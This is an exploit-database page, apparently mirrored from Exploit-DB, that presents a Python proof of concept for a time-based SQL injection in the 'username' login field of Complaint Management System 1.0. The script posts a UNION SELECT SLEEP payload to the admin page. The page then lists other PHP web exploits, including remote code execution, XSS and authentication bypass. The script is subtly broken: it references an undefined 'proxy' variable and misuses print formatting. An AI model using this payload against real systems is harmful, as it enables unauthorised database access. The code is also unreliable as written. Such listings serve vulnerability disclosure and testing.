Search for hundreds of thousands of exploits

"Complaint Management System 1.0 - 'username' SQL Injection"

Author

Exploit author

"Daniel Ortiz"

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-05-12
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:  https://www.sourcecodester.com/php/14206/complaint-management-system.html

#!/usr/bin/python

import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

def main():
    
    target = sys.argv[1]
    payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"
    url = "http://%s/cms/admin/index.php" % target
    
    print("[+] Target: %s") % target
    print("[+] Injecting payload: %s") % payload

    inject(url, payload)

def inject(url, payload):

    s = requests.Session()
    d = {'username': payload, 'password': 'admin', 'submit': ''} 
    r = s.post(url, data=d, proxies=proxy)


if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("(-) usage: %s  TARGET" % sys.argv[0])
        print("(-) e.g: %s  192.168.0.10" % sys.argv[0]) 
        sys.exit(-1)

    main()
Release DateTitleTypePlatformAuthor
2020-09-18"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)"webappsphp"Nikolas Geiselman"
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48468/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.